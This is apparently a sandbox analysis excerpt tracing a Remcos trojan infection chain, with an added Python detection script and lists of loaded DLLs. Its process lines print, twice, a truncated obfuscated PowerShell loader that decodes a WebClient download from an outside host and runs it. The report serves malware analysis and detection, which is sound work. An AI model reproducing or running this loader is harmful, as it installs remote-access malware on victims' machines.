              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: unknown | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "echo $Telekabler; function Katukina($Fangedragters){$Havanlggene=4;$Protestantiskes=$Havanlggene;do{$Commissionship161+=$Fangedragters[$Protestantiskes];$Protestantiskes+=5} until(!$Fangedragters[$Protestantiskes])$Commissionship161}function Myndiges($Molossian120){ .($Butleress) ($Molossian120)}$Katalogbestilling=Katukina ' ovlnTommE ejutAppe.BesvW';$Katalogbestilling+=Katukina 'B kkEAff.BU secSnitLBajai FilEFor nNonrT';$Sylterne=Katukina 'FortM S joSirezAnbeiSkablThrol,hroaOpre/';$Nonagricultural=Katukina 'Non TSnerlStarsRuff1Revi2';$duplicand='Slot[AnskNHypeeEtm tC ll.P gmsLimnE Ba RContvListIOverCOverEHa nP StaotidsI,kolnkl,pt SinMBec.A,quiNSammABarsgAfstEformrlege]Ove.:Om r:Bhmns ribE A.lC ,otU goeRVejai Pu,tMondyObskpGasvr Pr.ofru.tKanooBol cTe.moSperlRech=mi l$ ftenHum O ystNPresACounGGappRSigii OupcShrau acklStutTTo.dUFigeR.harAReacl';$Sylterne+=Katukina 'Stil5Stin. Mag0Sold Graa(Lo rWSystiMyxon Pred runoHellwMests Pla FrodNBirtT He V.s1 Ble0Temp..ili0Lill; Pol Ka.eWIm ei onan K i6N,ns4Sulu;Kati Des,xVe.s6gtev4Cusp;Dial KainrRaphvKomm:Slbe1Liti3 Ue 1Tyra.smaa0So k) Mya ,ecoGBogeeRye.cHospkOptroOeer/aspe2Phe 0Sequ1Topn0Disl0Rets1 .lv0Rist1 ,ch Kr oFGlaii lcrScaleUnrufstoroNon,xTyra/Di p1Gris3Give1 Pul.Oxyh0';$Konfigurationsmanualers=Katukina 'JustUlettSAuspEProtRVitr-EndaaRastGMotoeDro nMil T';$Injuriesag=Katukina 'MashhFrictGazetNoncpBefrs Ana:Fl n/St d/Petuo Towf Met1,armxT.is. Onci No cU deu .ub/ShamCOppoAKur.CPrenZLi ikMacrc D.rP ungfWh.l/ ovsS BegcBorehDronmTeleeSrgeetoporRe h.GrunaUnjec nata';$Taxiflyene192=Katukina 'P.em>';$Butleress=Katukina ' Auti eroE D vX';$grubledes='Tyrolervalsene';$overgreasiness='\Wealthmaking.Asr';Myndiges (Katukina 'Inds$anstGGl elUngroTornBR.nda osalSeab:skudaGlanSOverYDoweMUnimPdef,T El Oammot,elaeB dtST,oj=K rt$IndbeForsn Na V Spe:E.kaaGoldpRakkp AhmDQuanaNeglTAffaaSarg+Arsi$SkriOSafiVBarte IntRHoloGHistRPyloe,lipaSammsOverISt.tN OpbeTol s lavs');Myndiges (Katukina 'Olde$J,goG EndlKrito xtrBAcetAGarrlPlat:FisscKe.oHRenloPricKBrilsVl eTvet ATrmlRTu gT Kale MulR Al nAfrueLa.i= Paa$OrdkiForsnArt.jCh fuN.rsrPhenI,ugueBlacsHemiasv,rGLyri.Fjers rdpStivL SupIFo,otJa.u( .en$Adgat n naLadyX ondiSubsF Sa LSo dyS inE SveN UnfeMoni1Ca a9 ose2Coa.)');Myndiges (Katukina $duplicand);$Injuriesag=$Chokstarterne[0];$Remail=(Katukina 'Syzy$PseuGCapnlE.riOAns b .ndaRomalGran:BunkuBi eTSpa ISkueLEtambSul j icreArrolBlndiuanegHy r=FlyuNRougEflatw K,e-FrumO,teabUnb J edERkescSnylTFabr g,nos adgY S pS MidtUndeEO ermExot. ,ar$S,nkKOnycaP ertDdssAAmphLRamno Fodg GalbAnsgeRhexsGer tRensiJockLa.elLF.mbiBasiNDuelG');Myndiges ($Remail);Myndiges (Katukina 'Kont$ elsUf.ortVeltiEquilH llbFluxjZooce Genl Awai ecog,han.,linH UbeeSaddaF emdisopePrajr ruksOphe[ Ike$UdlgKNytao,ickn etefMagniA sogPrinuKursrAfdea RoitUn.ciM,ljoHalvn ants StamStrbaPerlnG uruHandaO,felVolie PunrNo fsIn t]Alti=Skur$SupeSZoniy TralDodetAruge
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
              Source: C:\Windows\SysWOW64\msiexec.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
              Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
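              The process lines above give the chain wscript.exe -> powershell.exe (System32) -> powershell.exe (SysWOW64) -> msiexec.exe started with no arguments -> C:\ProgramData\Remcos\remcos.exe, with a 5806-byte PowerShell command line. The Python below is an added detection example (it is not from the report or from Joe Sandbox) that turns those observations into checks over process-creation records. The records are constructed to mirror the report: PIDs 2504, 764 and 6804 are the ones the report names, the other PIDs are assumed, and the SysWOW64 PowerShell is assumed to be a child of the first PowerShell, which the report lists with an unknown parent. The 4096-byte command-line threshold is likewise an assumption chosen here.

```python
"""Process-chain checks for the execution path the report records:

    wscript.exe -> powershell.exe (x64) -> powershell.exe (SysWOW64)
               -> msiexec.exe (no install arguments) -> C:\\ProgramData\\Remcos\\remcos.exe

Added example, not part of the Joe Sandbox report. The records below are
constructed to mirror the report's "Process created" lines; PIDs 2504, 764
and 6804 are the report's, the rest are assumed, as is the parent of the
SysWOW64 PowerShell (the report lists it as unknown).
"""
from dataclasses import dataclass
from typing import List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 shape)."""
    pid: int
    ppid: int
    image: str      # full image path
    cmdline: str


SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
LONG_CMDLINE = 4096   # assumption; the report flags a 5806-byte command line
# Ordered ancestry the report shows before the dropped binary runs.
REPORTED_CHAIN = ["wscript.exe", "powershell.exe", "powershell.exe", "msiexec.exe"]

PS64 = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
PS32 = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"


def _stage1_cmdline(image: str) -> str:
    """The report's PowerShell command-line prefix, padded to its recorded 5806 bytes."""
    prefix = f'"{image}" "echo $Telekabler; function Katukina($Fangedragters){{'
    return prefix + "x" * (5806 - len(prefix))


# Constructed records modelled on the report, plus two benign events as noise.
EVENTS = [
    ProcEvent(5100, 4000, r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\Rokadernes.vbs"'),
    ProcEvent(2504, 5100, PS64, _stage1_cmdline(PS64)),
    ProcEvent(764, 2504, PS32, _stage1_cmdline(PS32)),
    ProcEvent(6804, 764, r"C:\Windows\SysWOW64\msiexec.exe", r'"C:\Windows\SysWOW64\msiexec.exe"'),
    ProcEvent(7000, 6804, r"C:\ProgramData\Remcos\remcos.exe", r'"C:\ProgramData\Remcos\remcos.exe"'),
    ProcEvent(9000, 4000, r"C:\Windows\System32\msiexec.exe",
              r'"C:\Windows\System32\msiexec.exe" /i C:\Users\user\Downloads\setup.msi'),
    ProcEvent(9100, 4000, PS64, rf'"{PS64}" -NoProfile -File C:\scripts\inventory.ps1'),
]


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(events: List[ProcEvent], pid: int) -> List[str]:
    """Image basenames from the oldest known ancestor down to `pid`."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # `seen` guards against PID-reuse loops
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain[::-1]


def matches_reported_chain(events: List[ProcEvent], pid: int) -> bool:
    """True when the ancestry of `pid` contains REPORTED_CHAIN as a contiguous run."""
    chain, n = ancestry(events, pid), len(REPORTED_CHAIN)
    return any(chain[i:i + n] == REPORTED_CHAIN for i in range(len(chain) - n + 1))


def bare_invocation(e: ProcEvent) -> bool:
    """Command line is only the (optionally quoted) image: no /i, /x, /package, ..."""
    return e.cmdline.strip().strip('"').lower() == e.image.lower()


def detect(events: List[ProcEvent]) -> List[Tuple[str, int]]:
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        img = basename(e.image)
        # 1. script host launching PowerShell with an oversized command line
        if img == "powershell.exe" and pimg in SCRIPT_HOSTS and len(e.cmdline) > LONG_CMDLINE:
            hits.append(("script_host_long_powershell", e.pid))
        # 2. PowerShell starting msiexec with no install arguments: the injection
        #    target the report records (APC queued, foreign memory written)
        if img == "msiexec.exe" and pimg == "powershell.exe" and bare_invocation(e):
            hits.append(("powershell_bare_msiexec", e.pid))
        # 3. msiexec spawning an executable out of C:\ProgramData
        if pimg == "msiexec.exe" and e.image.lower().startswith("c:\\programdata\\"):
            hits.append(("msiexec_spawns_programdata_exe", e.pid))
        # 4. the full chain the report shows, ending in whatever msiexec launched
        if pimg == "msiexec.exe" and matches_reported_chain(events, e.pid):
            hits.append(("reported_chain", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:32} pid={pid}  chain={' -> '.join(ancestry(EVENTS, pid))}")
```

              Rules 1 to 3 each fire on a single parent/child pair and so work on live EDR telemetry without a complete process tree; rule 4 needs the whole ancestry and is the one to run retrospectively over collected events. The benign MSI install and the scheduled script in the sample data produce no hits.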
              Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
               Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: pcacli.dll
               Source: C:\Windows\System32\wscript.exe | Section loaded: sfc_os.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
               Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sxs.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
               Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: apphelp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: apphelp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: aclayers.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mpr.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sfc_os.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wininet.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iertutil.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sspicli.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.storage.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wldp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: profapi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: kernel.appcore.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ondemandconnroutehelper.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winhttp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mswsock.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: iphlpapi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winnsi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: urlmon.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: srvcli.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: netutils.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dnsapi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rasadhlp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: fwpuclnt.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: schannel.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: mskeyprotect.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntasn1.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: msasn1.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: dpapi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptsp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: rsaenh.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: cryptbase.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: gpapi.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncrypt.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ncryptsslp.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: winmm.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: ntmarta.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: uxtheme.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: propsys.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: edputil.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: windows.staterepositoryps.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: wintypes.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: appresolver.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: bcp47langs.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: slc.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: userenv.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: sppc.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecorecommonproxystub.dll
               Source: C:\Windows\SysWOW64\msiexec.exe | Section loaded: onecoreuapcommonproxystub.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: msi.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: version.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: uxtheme.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textshaping.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: kernel.appcore.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: textinputframework.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coreuicomponents.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: coremessaging.dll
               Source: C:\ProgramData\Remcos\remcos.exe | Section loaded: ntmarta.dll
